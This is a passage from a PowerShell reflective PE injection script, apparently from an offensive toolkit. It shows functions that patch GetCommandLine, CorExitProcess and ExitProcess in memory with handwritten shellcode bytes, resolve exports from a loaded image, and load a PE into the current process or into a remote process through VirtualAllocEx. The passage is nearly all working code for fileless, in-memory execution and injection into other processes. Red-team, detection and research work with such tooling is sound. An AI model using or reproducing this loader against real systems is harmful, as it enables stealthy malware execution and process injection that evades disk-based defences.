[Type]$Win32Types.IMAGE_SECTION_HEADER)\n\t\t\t[IntPtr]$SectionPtr = Add-SignedIntAsUnsigned ($PEInfo.PEHandle) ($SectionHeader.VirtualAddress)\n\t\t\t\n\t\t\t[UInt32]$ProtectFlag = Get-VirtualProtectValue $SectionHeader.Characteristics\n\t\t\t[UInt32]$SectionSize = $SectionHeader.VirtualSize\n\t\t\t\n\t\t\t[UInt32]$OldProtectFlag = 0\n\t\t\tTest-MemoryRangeValid -DebugString \"Update-MemoryProtectionFlags::VirtualProtect\" -PEInfo $PEInfo -StartAddress $SectionPtr -Size $SectionSize | Out-Null\n\t\t\t$Success = $Win32Functions.VirtualProtect.Invoke($SectionPtr, $SectionSize, $ProtectFlag, [Ref]$OldProtectFlag)\n\t\t\tif ($Success -eq $false)\n\t\t\t{\n\t\t\t\tThrow \"Unable to change memory protection\"\n\t\t\t}\n\t\t}\n\t}\n\t\n\t#This function overwrites GetCommandLine and ExitThread which are needed to reflectively load an EXE\n\t#Returns an object with addresses to copies of the bytes that were overwritten (and the count)\n\tFunction Update-ExeFunctions\n\t{\n\t\tParam(\n\t\t[Parameter(Position = 0, Mandatory = $true)]\n\t\t[System.Object]\n\t\t$PEInfo,\n\t\t\n\t\t[Parameter(Position = 1, Mandatory = $true)]\n\t\t[System.Object]\n\t\t$Win32Functions,\n\t\t\n\t\t[Parameter(Position = 2, Mandatory = $true)]\n\t\t[System.Object]\n\t\t$Win32Constants,\n\t\t\n\t\t[Parameter(Position = 3, Mandatory = $true)]\n\t\t[String]\n\t\t$ExeArguments,\n\t\t\n\t\t[Parameter(Position = 4, Mandatory = $true)]\n\t\t[IntPtr]\n\t\t$ExeDoneBytePtr\n\t\t)\n\t\t\n\t\t#This will be an array of arrays. The inner array will consist of: @($DestAddr, $SourceAddr, $ByteCount). This is used to return memory to its original state.\n\t\t$ReturnArray = @() \n\t\t\n\t\t$PtrSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr])\n\t\t[UInt32]$OldProtectFlag = 0\n\t\t\n\t\t[IntPtr]$Kernel32Handle = $Win32Functions.GetModuleHandle.Invoke(\"Kernel32.dll\")\n\t\tif ($Kernel32Handle -eq [IntPtr]::Zero)\n\t\t{\n\t\t\tthrow \"Kernel32 handle null\"\n\t\t}\n\t\t\n\t\t[IntPtr]$KernelBaseHandle = $Win32Functions.GetModuleHandle.Invoke(\"KernelBase.dll\")\n\t\tif ($KernelBaseHandle -eq [IntPtr]::Zero)\n\t\t{\n\t\t\tthrow \"KernelBase handle null\"\n\t\t}\n\n\t\t#################################################\n\t\t#First overwrite the GetCommandLine() function. This is the function that is called by a new process to get the command line args used to start it.\n\t\t#\tWe overwrite it with shellcode to return a pointer to the string ExeArguments, allowing us to pass the exe any args we want.\n\t\t$CmdLineWArgsPtr = [System.Runtime.InteropServices.Marshal]::StringToHGlobalUni($ExeArguments)\n\t\t$CmdLineAArgsPtr = [System.Runtime.InteropServices.Marshal]::StringToHGlobalAnsi($ExeArguments)\n\t\n\t\t[IntPtr]$GetCommandLineAAddr = $Win32Functions.GetProcAddress.Invoke($KernelBaseHandle, \"GetCommandLineA\")\n\t\t[IntPtr]$GetCommandLineWAddr = $Win32Functions.GetProcAddress.Invoke($KernelBaseHandle, \"GetCommandLineW\")\n\n\t\tif ($GetCommandLineAAddr -eq [IntPtr]::Zero -or $GetCommandLineWAddr -eq [IntPtr]::Zero)\n\t\t{\n\t\t\tthrow \"GetCommandLine ptr null. GetCommandLineA: $GetCommandLineAAddr. GetCommandLineW: $GetCommandLineWAddr\"\n\t\t}\n\n\t\t#Prepare the shellcode\n\t\t[Byte[]]$Shellcode1 = @()\n\t\tif ($PtrSize -eq 8)\n\t\t{\n\t\t\t$Shellcode1 += 0x48\t#64bit shellcode has the 0x48 before the 0xb8\n\t\t}\n\t\t$Shellcode1 += 0xb8\n\t\t\n\t\t[Byte[]]$Shellcode2 = @(0xc3)\n\t\t$TotalSize = $Shellcode1.Length + $PtrSize + $Shellcode2.Length\n\t\t\n\t\t\n\t\t#Make copy of GetCommandLineA and GetCommandLineW\n\t\t$GetCommandLineAOrigBytesPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($TotalSize)\n\t\t$GetCommandLineWOrigBytesPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($TotalSize)\n\t\t$Win32Functions.memcpy.Invoke($GetCommandLineAOrigBytesPtr, $GetCommandLineAAddr, [UInt64]$TotalSize) | Out-Null\n\t\t$Win32Functions.memcpy.Invoke($GetCommandLineWOrigBytesPtr, $GetCommandLineWAddr, [UInt64]$TotalSize) | Out-Null\n\t\t$ReturnArray += ,($GetCommandLineAAddr, $GetCommandLineAOrigBytesPtr, $TotalSize)\n\t\t$ReturnArray += ,($GetCommandLineWAddr, $GetCommandLineWOrigBytesPtr, $TotalSize)\n\n\t\t#Overwrite GetCommandLineA\n\t\t[UInt32]$OldProtectFlag = 0\n\t\t$Success = $Win32Functions.VirtualProtect.Invoke($GetCommandLineAAddr, [UInt32]$TotalSize, [UInt32]($Win32Constants.PAGE_EXECUTE_READWRITE), [Ref]$OldProtectFlag)\n\t\tif ($Success = $false)\n\t\t{\n\t\t\tthrow \"Call to VirtualProtect failed\"\n\t\t}\n\t\t\n\t\t$GetCommandLineAAddrTemp = $GetCommandLineAAddr\n\t\tWrite-BytesToMemory -Bytes $Shellcode1 -MemoryAddress $GetCommandLineAAddrTemp\n\t\t$GetCommandLineAAddrTemp = Add-SignedIntAsUnsigned $GetCommandLineAAddrTemp ($Shellcode1.Length)\n\t\t[System.Runtime.InteropServices.Marshal]::StructureToPtr($CmdLineAArgsPtr, $GetCommandLineAAddrTemp, $false)\n\t\t$GetCommandLineAAddrTemp = Add-SignedIntAsUnsigned $GetCommandLineAAddrTemp $PtrSize\n\t\tWrite-BytesToMemory -Bytes $Shellcode2 -MemoryAddress $GetCommandLineAAddrTemp\n\t\t\n\t\t$Win32Functions.VirtualProtect.Invoke($GetCommandLineAAddr, [UInt32]$TotalSize, [UInt32]$OldProtectFlag, [Ref]$OldProtectFlag) | Out-Null\n\t\t\n\t\t\n\t\t#Overwrite GetCommandLineW\n\t\t[UInt32]$OldProtectFlag = 0\n\t\t$Success = $Win32Functions.VirtualProtect.Invoke($GetCommandLineWAddr, [UInt32]$TotalSize, [UInt32]($Win32Constants.PAGE_EXECUTE_READWRITE), [Ref]$OldProtectFlag)\n\t\tif ($Success = $false)\n\t\t{\n\t\t\tthrow \"Call to VirtualProtect failed\"\n\t\t}\n\t\t\n\t\t$GetCommandLineWAddrTemp = $GetCommandLineWAddr\n\t\tWrite-BytesToMemory -Bytes $Shellcode1 -MemoryAddress $GetCommandLineWAddrTemp\n\t\t$GetCommandLineWAddrTemp = Add-SignedIntAsUnsigned $GetCommandLineWAddrTemp ($Shellcode1.Length)\n\t\t[System.Runtime.InteropServices.Marshal]::StructureToPtr($CmdLineWArgsPtr, $GetCommandLineWAddrTemp, $false)\n\t\t$GetCommandLineWAddrTemp = Add-SignedIntAsUnsigned $GetCommandLineWAddrTemp $PtrSize\n\t\tWrite-BytesToMemory -Bytes $Shellcode2 -MemoryAddress $GetCommandLineWAddrTemp\n\t\t\n\t\t$Win32Functions.VirtualProtect.Invoke($GetCommandLineWAddr, [UInt32]$TotalSize, [UInt32]$OldProtectFlag, [Ref]$OldProtectFlag) | Out-Null\n\t\t#################################################\n\t\t\n\t\t\n\t\t#################################################\n\t\t#For C++ stuff that is compiled with visual studio as \"multithreaded DLL\", the above method of overwriting GetCommandLine doesn't work.\n\t\t#\tI don't know why exactly.. But the msvcr DLL that a \"DLL compiled executable\" imports has an export called _acmdln and _wcmdln.\n\t\t#\tIt appears to call GetCommandLine and store the result in this var. Then when you call __wgetcmdln it parses and returns the\n\t\t#\targv and argc values stored in these variables. So the easy thing to do is just overwrite the variable since they are exported.\n\t\t$DllList = @(\"msvcr70d.dll\", \"msvcr71d.dll\", \"msvcr80d.dll\", \"msvcr90d.dll\", \"msvcr100d.dll\", \"msvcr110d.dll\", \"msvcr70.dll\" `\n\t\t\t, \"msvcr71.dll\", \"msvcr80.dll\", \"msvcr90.dll\", \"msvcr100.dll\", \"msvcr110.dll\")\n\t\t\n\t\tforeach ($Dll in $DllList)\n\t\t{\n\t\t\t[IntPtr]$DllHandle = $Win32Functions.GetModuleHandle.Invoke($Dll)\n\t\t\tif ($DllHandle -ne [IntPtr]::Zero)\n\t\t\t{\n\t\t\t\t[IntPtr]$WCmdLnAddr = $Win32Functions.GetProcAddress.Invoke($DllHandle, \"_wcmdln\")\n\t\t\t\t[IntPtr]$ACmdLnAddr = $Win32Functions.GetProcAddress.Invoke($DllHandle, \"_acmdln\")\n\t\t\t\tif ($WCmdLnAddr -eq [IntPtr]::Zero -or $ACmdLnAddr -eq [IntPtr]::Zero)\n\t\t\t\t{\n\t\t\t\t\t\"Error, couldn't find _wcmdln or _acmdln\"\n\t\t\t\t}\n\t\t\t\t\n\t\t\t\t$NewACmdLnPtr = [System.Runtime.InteropServices.Marshal]::StringToHGlobalAnsi($ExeArguments)\n\t\t\t\t$NewWCmdLnPtr = [System.Runtime.InteropServices.Marshal]::StringToHGlobalUni($ExeArguments)\n\t\t\t\t\n\t\t\t\t#Make a copy of the original char* and wchar_t* so these variables can be returned back to their original state\n\t\t\t\t$OrigACmdLnPtr = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ACmdLnAddr, [Type][IntPtr])\n\t\t\t\t$OrigWCmdLnPtr = [System.Runtime.InteropServices.Marshal]::PtrToStructure($WCmdLnAddr, [Type][IntPtr])\n\t\t\t\t$OrigACmdLnPtrStorage = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($PtrSize)\n\t\t\t\t$OrigWCmdLnPtrStorage = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($PtrSize)\n\t\t\t\t[System.Runtime.InteropServices.Marshal]::StructureToPtr($OrigACmdLnPtr, $OrigACmdLnPtrStorage, $false)\n\t\t\t\t[System.Runtime.InteropServices.Marshal]::StructureToPtr($OrigWCmdLnPtr, $OrigWCmdLnPtrStorage, $false)\n\t\t\t\t$ReturnArray += ,($ACmdLnAddr, $OrigACmdLnPtrStorage, $PtrSize)\n\t\t\t\t$ReturnArray += ,($WCmdLnAddr, $OrigWCmdLnPtrStorage, $PtrSize)\n\t\t\t\t\n\t\t\t\t$Success = $Win32Functions.VirtualProtect.Invoke($ACmdLnAddr, [UInt32]$PtrSize, [UInt32]($Win32Constants.PAGE_EXECUTE_READWRITE), [Ref]$OldProtectFlag)\n\t\t\t\tif ($Success = $false)\n\t\t\t\t{\n\t\t\t\t\tthrow \"Call to VirtualProtect failed\"\n\t\t\t\t}\n\t\t\t\t[System.Runtime.InteropServices.Marshal]::StructureToPtr($NewACmdLnPtr, $ACmdLnAddr, $false)\n\t\t\t\t$Win32Functions.VirtualProtect.Invoke($ACmdLnAddr, [UInt32]$PtrSize, [UInt32]($OldProtectFlag), [Ref]$OldProtectFlag) | Out-Null\n\t\t\t\t\n\t\t\t\t$Success = $Win32Functions.VirtualProtect.Invoke($WCmdLnAddr, [UInt32]$PtrSize, [UInt32]($Win32Constants.PAGE_EXECUTE_READWRITE), [Ref]$OldProtectFlag)\n\t\t\t\tif ($Success = $false)\n\t\t\t\t{\n\t\t\t\t\tthrow \"Call to VirtualProtect failed\"\n\t\t\t\t}\n\t\t\t\t[System.Runtime.InteropServices.Marshal]::StructureToPtr($NewWCmdLnPtr, $WCmdLnAddr, $false)\n\t\t\t\t$Win32Functions.VirtualProtect.Invoke($WCmdLnAddr, [UInt32]$PtrSize, [UInt32]($OldProtectFlag), [Ref]$OldProtectFlag) | Out-Null\n\t\t\t}\n\t\t}\n\t\t#################################################\n\t\t\n\t\t\n\t\t#################################################\n\t\t#Next overwrite CorExitProcess and ExitProcess to instead ExitThread. This way the entire Powershell process doesn't die when the EXE exits.\n\n\t\t$ReturnArray = @()\n\t\t$ExitFunctions = @() #Array of functions to overwrite so the thread doesn't exit the process\n\t\t\n\t\t#CorExitProcess (compiled in to visual studio c++)\n\t\t[IntPtr]$MscoreeHandle = $Win32Functions.GetModuleHandle.Invoke(\"mscoree.dll\")\n\t\tif ($MscoreeHandle -eq [IntPtr]::Zero)\n\t\t{\n\t\t\tthrow \"mscoree handle null\"\n\t\t}\n\t\t[IntPtr]$CorExitProcessAddr = $Win32Functions.GetProcAddress.Invoke($MscoreeHandle, \"CorExitProcess\")\n\t\tif ($CorExitProcessAddr -eq [IntPtr]::Zero)\n\t\t{\n\t\t\tThrow \"CorExitProcess address not found\"\n\t\t}\n\t\t$ExitFunctions += $CorExitProcessAddr\n\t\t\n\t\t#ExitProcess (what non-managed programs use)\n\t\t[IntPtr]$ExitProcessAddr = $Win32Functions.GetProcAddress.Invoke($Kernel32Handle, \"ExitProcess\")\n\t\tif ($ExitProcessAddr -eq [IntPtr]::Zero)\n\t\t{\n\t\t\tThrow \"ExitProcess address not found\"\n\t\t}\n\t\t$ExitFunctions += $ExitProcessAddr\n\t\t\n\t\t[UInt32]$OldProtectFlag = 0\n\t\tforeach ($ProcExitFunctionAddr in $ExitFunctions)\n\t\t{\n\t\t\t$ProcExitFunctionAddrTmp = $ProcExitFunctionAddr\n\t\t\t#The following is the shellcode (Shellcode: ExitThread.asm):\n\t\t\t#32bit shellcode\n\t\t\t[Byte[]]$Shellcode1 = @(0xbb)\n\t\t\t[Byte[]]$Shellcode2 = @(0xc6, 0x03, 0x01, 0x83, 0xec, 0x20, 0x83, 0xe4, 0xc0, 0xbb)\n\t\t\t#64bit shellcode (Shellcode: ExitThread.asm)\n\t\t\tif ($PtrSize -eq 8)\n\t\t\t{\n\t\t\t\t[Byte[]]$Shellcode1 = @(0x48, 0xbb)\n\t\t\t\t[Byte[]]$Shellcode2 = @(0xc6, 0x03, 0x01, 0x48, 0x83, 0xec, 0x20, 0x66, 0x83, 0xe4, 0xc0, 0x48, 0xbb)\n\t\t\t}\n\t\t\t[Byte[]]$Shellcode3 = @(0xff, 0xd3)\n\t\t\t$TotalSize = $Shellcode1.Length + $PtrSize + $Shellcode2.Length + $PtrSize + $Shellcode3.Length\n\t\t\t\n\t\t\t[IntPtr]$ExitThreadAddr = $Win32Functions.GetProcAddress.Invoke($Kernel32Handle, \"ExitThread\")\n\t\t\tif ($ExitThreadAddr -eq [IntPtr]::Zero)\n\t\t\t{\n\t\t\t\tThrow \"ExitThread address not found\"\n\t\t\t}\n\n\t\t\t$Success = $Win32Functions.VirtualProtect.Invoke($ProcExitFunctionAddr, [UInt32]$TotalSize, [UInt32]$Win32Constants.PAGE_EXECUTE_READWRITE, [Ref]$OldProtectFlag)\n\t\t\tif ($Success -eq $false)\n\t\t\t{\n\t\t\t\tThrow \"Call to VirtualProtect failed\"\n\t\t\t}\n\t\t\t\n\t\t\t#Make copy of original ExitProcess bytes\n\t\t\t$ExitProcessOrigBytesPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($TotalSize)\n\t\t\t$Win32Functions.memcpy.Invoke($ExitProcessOrigBytesPtr, $ProcExitFunctionAddr, [UInt64]$TotalSize) | Out-Null\n\t\t\t$ReturnArray += ,($ProcExitFunctionAddr, $ExitProcessOrigBytesPtr, $TotalSize)\n\t\t\t\n\t\t\t#Write the ExitThread shellcode to memory. This shellcode will write 0x01 to ExeDoneBytePtr address (so PS knows the EXE is done), then \n\t\t\t#\tcall ExitThread\n\t\t\tWrite-BytesToMemory -Bytes $Shellcode1 -MemoryAddress $ProcExitFunctionAddrTmp\n\t\t\t$ProcExitFunctionAddrTmp = Add-SignedIntAsUnsigned $ProcExitFunctionAddrTmp ($Shellcode1.Length)\n\t\t\t[System.Runtime.InteropServices.Marshal]::StructureToPtr($ExeDoneBytePtr, $ProcExitFunctionAddrTmp, $false)\n\t\t\t$ProcExitFunctionAddrTmp = Add-SignedIntAsUnsigned $ProcExitFunctionAddrTmp $PtrSize\n\t\t\tWrite-BytesToMemory -Bytes $Shellcode2 -MemoryAddress $ProcExitFunctionAddrTmp\n\t\t\t$ProcExitFunctionAddrTmp = Add-SignedIntAsUnsigned $ProcExitFunctionAddrTmp ($Shellcode2.Length)\n\t\t\t[System.Runtime.InteropServices.Marshal]::StructureToPtr($ExitThreadAddr, $ProcExitFunctionAddrTmp, $false)\n\t\t\t$ProcExitFunctionAddrTmp = Add-SignedIntAsUnsigned $ProcExitFunctionAddrTmp $PtrSize\n\t\t\tWrite-BytesToMemory -Bytes $Shellcode3 -MemoryAddress $ProcExitFunctionAddrTmp\n\n\t\t\t$Win32Functions.VirtualProtect.Invoke($ProcExitFunctionAddr, [UInt32]$TotalSize, [UInt32]$OldProtectFlag, [Ref]$OldProtectFlag) | Out-Null\n\t\t}\n\t\t#################################################\n\n\t\tWrite-Output $ReturnArray\n\t}\n\t\n\t\n\t#This function takes an array of arrays, the inner array of format @($DestAddr, $SourceAddr, $Count)\n\t#\tIt copies Count bytes from Source to Destination.\n\tFunction Copy-ArrayOfMemAddresses\n\t{\n\t\tParam(\n\t\t[Parameter(Position = 0, Mandatory = $true)]\n\t\t[Array[]]\n\t\t$CopyInfo,\n\t\t\n\t\t[Parameter(Position = 1, Mandatory = $true)]\n\t\t[System.Object]\n\t\t$Win32Functions,\n\t\t\n\t\t[Parameter(Position = 2, Mandatory = $true)]\n\t\t[System.Object]\n\t\t$Win32Constants\n\t\t)\n\n\t\t[UInt32]$OldProtectFlag = 0\n\t\tforeach ($Info in $CopyInfo)\n\t\t{\n\t\t\t$Success = $Win32Functions.VirtualProtect.Invoke($Info[0], [UInt32]$Info[2], [UInt32]$Win32Constants.PAGE_EXECUTE_READWRITE, [Ref]$OldProtectFlag)\n\t\t\tif ($Success -eq $false)\n\t\t\t{\n\t\t\t\tThrow \"Call to VirtualProtect failed\"\n\t\t\t}\n\t\t\t\n\t\t\t$Win32Functions.memcpy.Invoke($Info[0], $Info[1], [UInt64]$Info[2]) | Out-Null\n\t\t\t\n\t\t\t$Win32Functions.VirtualProtect.Invoke($Info[0], [UInt32]$Info[2], [UInt32]$OldProtectFlag, [Ref]$OldProtectFlag) | Out-Null\n\t\t}\n\t}\n\n\n\t#####################################\n\t##########    FUNCTIONS   ###########\n\t#####################################\n\tFunction Get-MemoryProcAddress\n\t{\n\t\tParam(\n\t\t[Parameter(Position = 0, Mandatory = $true)]\n\t\t[IntPtr]\n\t\t$PEHandle,\n\t\t\n\t\t[Parameter(Position = 1, Mandatory = $true)]\n\t\t[String]\n\t\t$FunctionName\n\t\t)\n\t\t\n\t\t$Win32Types = Get-Win32Types\n\t\t$Win32Constants = Get-Win32Constants\n\t\t$PEInfo = Get-PEDetailedInfo -PEHandle $PEHandle -Win32Types $Win32Types -Win32Constants $Win32Constants\n\t\t\n\t\t#Get the export table\n\t\tif ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.ExportTable.Size -eq 0)\n\t\t{\n\t\t\treturn [IntPtr]::Zero\n\t\t}\n\t\t$ExportTablePtr = Add-SignedIntAsUnsigned ($PEHandle) ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.ExportTable.VirtualAddress)\n\t\t$ExportTable = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ExportTablePtr, [Type]$Win32Types.IMAGE_EXPORT_DIRECTORY)\n\t\t\n\t\tfor ($i = 0; $i -lt $ExportTable.NumberOfNames; $i++)\n\t\t{\n\t\t\t#AddressOfNames is an array of pointers to strings of the names of the functions exported\n\t\t\t$NameOffsetPtr = Add-SignedIntAsUnsigned ($PEHandle) ($ExportTable.AddressOfNames + ($i * [System.Runtime.InteropServices.Marshal]::SizeOf([Type][UInt32])))\n\t\t\t$NamePtr = Add-SignedIntAsUnsigned ($PEHandle) ([System.Runtime.InteropServices.Marshal]::PtrToStructure($NameOffsetPtr, [Type][UInt32]))\n\t\t\t$Name = [System.Runtime.InteropServices.Marshal]::PtrToStringAnsi($NamePtr)\n\n\t\t\tif ($Name -ceq $FunctionName)\n\t\t\t{\n\t\t\t\t#AddressOfNameOrdinals is a table which contains points to a WORD which is the index in to AddressOfFunctions\n\t\t\t\t#    which contains the offset of the function in to the DLL\n\t\t\t\t$OrdinalPtr = Add-SignedIntAsUnsigned ($PEHandle) ($ExportTable.AddressOfNameOrdinals + ($i * [System.Runtime.InteropServices.Marshal]::SizeOf([Type][UInt16])))\n\t\t\t\t$FuncIndex = [System.Runtime.InteropServices.Marshal]::PtrToStructure($OrdinalPtr, [Type][UInt16])\n\t\t\t\t$FuncOffsetAddr = Add-SignedIntAsUnsigned ($PEHandle) ($ExportTable.AddressOfFunctions + ($FuncIndex * [System.Runtime.InteropServices.Marshal]::SizeOf([Type][UInt32])))\n\t\t\t\t$FuncOffset = [System.Runtime.InteropServices.Marshal]::PtrToStructure($FuncOffsetAddr, [Type][UInt32])\n\t\t\t\treturn Add-SignedIntAsUnsigned ($PEHandle) ($FuncOffset)\n\t\t\t}\n\t\t}\n\t\t\n\t\treturn [IntPtr]::Zero\n\t}\n\n\n\tFunction Invoke-MemoryLoadLibrary\n\t{\n\t\tParam(\n\t\t[Parameter( Position = 0, Mandatory = $true )]\n\t\t[Byte[]]\n\t\t$PEBytes,\n\t\t\n\t\t[Parameter(Position = 1, Mandatory = $false)]\n\t\t[String]\n\t\t$ExeArgs,\n\t\t\n\t\t[Parameter(Position = 2, Mandatory = $false)]\n\t\t[IntPtr]\n\t\t$RemoteProcHandle\n\t\t)\n\t\t\n\t\t$PtrSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr])\n\t\t\n\t\t#Get Win32 constants and functions\n\t\t$Win32Constants = Get-Win32Constants\n\t\t$Win32Functions = Get-Win32Functions\n\t\t$Win32Types = Get-Win32Types\n\t\t\n\t\t$RemoteLoading = $false\n\t\tif (($RemoteProcHandle -ne $null) -and ($RemoteProcHandle -ne [IntPtr]::Zero))\n\t\t{\n\t\t\t$RemoteLoading = $true\n\t\t}\n\t\t\n\t\t#Get basic PE information\n\t\tWrite-Verbose \"Getting basic PE information from the file\"\n\t\t$PEInfo = Get-PEBasicInfo -PEBytes $PEBytes -Win32Types $Win32Types\n\t\t$OriginalImageBase = $PEInfo.OriginalImageBase\n\t\t$NXCompatible = $true\n\t\tif (([Int] $PEInfo.DllCharacteristics -band $Win32Constants.IMAGE_DLLCHARACTERISTICS_NX_COMPAT) -ne $Win32Constants.IMAGE_DLLCHARACTERISTICS_NX_COMPAT)\n\t\t{\n\t\t\tWrite-Warning \"PE is not compatible with DEP, might cause issues\" -WarningAction Continue\n\t\t\t$NXCompatible = $false\n\t\t}\n\t\t\n\t\t\n\t\t#Verify that the PE and the current process are the same bits (32bit or 64bit)\n\t\t$Process64Bit = $true\n\t\tif ($RemoteLoading -eq $true)\n\t\t{\n\t\t\t$Kernel32Handle = $Win32Functions.GetModuleHandle.Invoke(\"kernel32.dll\")\n\t\t\t$Result = $Win32Functions.GetProcAddress.Invoke($Kernel32Handle, \"IsWow64Process\")\n\t\t\tif ($Result -eq [IntPtr]::Zero)\n\t\t\t{\n\t\t\t\tThrow \"Couldn't locate IsWow64Process function to determine if target process is 32bit or 64bit\"\n\t\t\t}\n\t\t\t\n\t\t\t[Bool]$Wow64Process = $false\n\t\t\t$Success = $Win32Functions.IsWow64Process.Invoke($RemoteProcHandle, [Ref]$Wow64Process)\n\t\t\tif ($Success -eq $false)\n\t\t\t{\n\t\t\t\tThrow \"Call to IsWow64Process failed\"\n\t\t\t}\n\t\t\t\n\t\t\tif (($Wow64Process -eq $true) -or (($Wow64Process -eq $false) -and ([System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr]) -eq 4)))\n\t\t\t{\n\t\t\t\t$Process64Bit = $false\n\t\t\t}\n\t\t\t\n\t\t\t#PowerShell needs to be same bit as the PE being loaded for IntPtr to work correctly\n\t\t\t$PowerShell64Bit = $true\n\t\t\tif ([System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr]) -ne 8)\n\t\t\t{\n\t\t\t\t$PowerShell64Bit = $false\n\t\t\t}\n\t\t\tif ($PowerShell64Bit -ne $Process64Bit)\n\t\t\t{\n\t\t\t\tthrow \"PowerShell must be same architecture (x86/x64) as PE being loaded and remote process\"\n\t\t\t}\n\t\t}\n\t\telse\n\t\t{\n\t\t\tif ([System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr]) -ne 8)\n\t\t\t{\n\t\t\t\t$Process64Bit = $false\n\t\t\t}\n\t\t}\n\t\tif ($Process64Bit -ne $PEInfo.PE64Bit)\n\t\t{\n\t\t\tThrow \"PE platform doesn't match the architecture of the process it is being loaded in (32/64bit)\"\n\t\t}\n\t\t\n\n\t\t#Allocate memory and write the PE to memory. If the PE supports ASLR, allocate to a random memory address\n\t\tWrite-Verbose \"Allocating memory for the PE and write its headers to memory\"\n\t\t\n\t\t[IntPtr]$LoadAddr = [IntPtr]::Zero\n\t\tif (([Int] $PEInfo.DllCharacteristics -band $Win32Constants.IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE) -ne $Win32Constants.IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE)\n\t\t{\n\t\t\tWrite-Warning \"PE file being reflectively loaded is not ASLR compatible. If the loading fails, try restarting PowerShell and trying again\" -WarningAction Continue\n\t\t\t[IntPtr]$LoadAddr = $OriginalImageBase\n\t\t}\n\n\t\t$PEHandle = [IntPtr]::Zero\t\t\t\t#This is where the PE is allocated in PowerShell\n\t\t$EffectivePEHandle = [IntPtr]::Zero\t\t#This is the address the PE will be loaded to. If it is loaded in PowerShell, this equals $PEHandle. If it is loaded in a remote process, this is the address in the remote process.\n\t\tif ($RemoteLoading -eq $true)\n\t\t{\n\t\t\t#Allocate space in the remote process, and also allocate space in PowerShell. The PE will be setup in PowerShell and copied to the remote process when it is setup\n\t\t\t$PEHandle = $Win32Functions.VirtualAlloc.Invoke([IntPtr]::Zero, [UIntPtr]$PEInfo.SizeOfImage, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_READWRITE)\n\t\t\t\n\t\t\t#todo, error handling needs to delete this memory if an error happens along the way\n\t\t\t$EffectivePEHandle = $Win32Functions.VirtualAllocEx.Invoke($RemoteProcHandle, $LoadAddr, [UIntPtr]$PEInfo.SizeOfImage, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_EXECUTE_READWRITE)\n\t\t\tif ($EffectivePEHandle -eq [IntPtr]::Zero)\n\t\t\t{\n\t\t\t\tThrow \"Unable to allocate memory in the remote process. If the PE being loaded doesn't support ASLR, it could be that the requested base address of the PE is already in use\"\n\t\t\t}\n\t\t}\n\t\telse\n\t\t{\n\t\t\tif ($NXCompatible -eq $true)\n\t\t\t{\n\t\t\t\t$PEHandle = $Win32Functions.VirtualAlloc.Invoke($LoadAddr, [UIntPtr]$PEInfo.SizeOfImage, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_READWRITE)\n\t\t\t}\n\t\t\telse\n\t\t\t{\n\t\t\t\t$PEHandle = $Win32Functions.VirtualAlloc.Invoke($LoadAddr, [UIntPtr]$PEInfo.SizeOfImage, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_EXECUTE_READWRITE)\n\t\t\t}\n\t\t\t$EffectivePEHandle = $PEHandle\n\t\t}\n\t\t\n\t\t[IntPtr]$PEEndAddress = Add-SignedIntAsUnsigned ($PEHandle) ([Int64]$PEInfo.SizeOfImage)\n\t\tif ($PEHandle -eq [IntPtr]::Zero)\n\t\t{ \n\t\t\tThrow \"VirtualAlloc failed to allocate memory for PE. If PE is not ASLR compatible, try running the script in a new PowerShell process (the new PowerShell process will have a different memory layout, so the address the PE wants might be free).\"\n\t\t}\t\t\n\t\t[System.Runtime.InteropServices.Marshal]::Copy($PEBytes, 0, $PEHandle, $PEInfo.SizeOfHeaders) | Out-Null\n\t\t\n\t\t\n\t\t#Now that the PE is in memory, get more detailed information about it\n\t\tWrite-Verbose \"Getting detailed PE information from the headers loaded in memory\"\n\t\t$PEInfo = Get-PEDetailedInfo -PEHandle $PEHandle -Win32Types $Win32Types -Win32Constants $Win32Constants\n\t\t$PEInfo | Add-Member -MemberType NoteProperty -Name EndAddress -Value $PEEndAddress\n\t\t$PEInfo | Add-Member -MemberType NoteProperty -Name EffectivePEHandle -Value $EffectivePEHandle\n\t\tWrite-Verbose \"StartAddress: $PEHandle    EndAddress: $PEEndAddress\"\n\t\t\n\t\t\n\t\t#Copy each section from the PE in to memory\n\t\tWrite-Verbose \"Copy PE sections in to memory\"\n\t\tCopy-Sections -PEBytes $PEBytes -PEInfo $PEInfo -Win32Functions $Win32Functions -Win32Types $Win32Types\n\t\t\n\t\t\n\t\t#Update the memory addresses hardcoded in to the PE based on the memory address the PE was expecting to be loaded to vs where it was actually loaded\n\t\tWrite-Verbose \"Update memory addresses based on where the PE was actually loaded in memory\"\n\t\tUpdate-MemoryAddresses -PEInfo $PEInfo -OriginalImageBase $OriginalImageBase -Win32Constants $Win32Constants -Win32Types $Win32Types\n\n\t\t\n\t\t#The PE we are in-memory loading has DLLs it needs, import those DLLs for it\n\t\tWrite-Verbose \"Import DLL's needed by the PE we are loading\"\n\t\tif ($RemoteLoading -eq $true)\n\t\t{\n\t\t\tImport-DllImports -PEInfo $PEInfo -Win32Functions $Win32Functions -Win32Types $Win32Types -Win32Constants $Win32Constants -RemoteProcHandle $RemoteProcHandle\n\t\t}\n\t\telse\n\t\t{\n\t\t\tImport-DllImports -PEInfo $PEInfo -Win32Functions $Win32Functions -Win32Types $Win32Types -Win32Constants 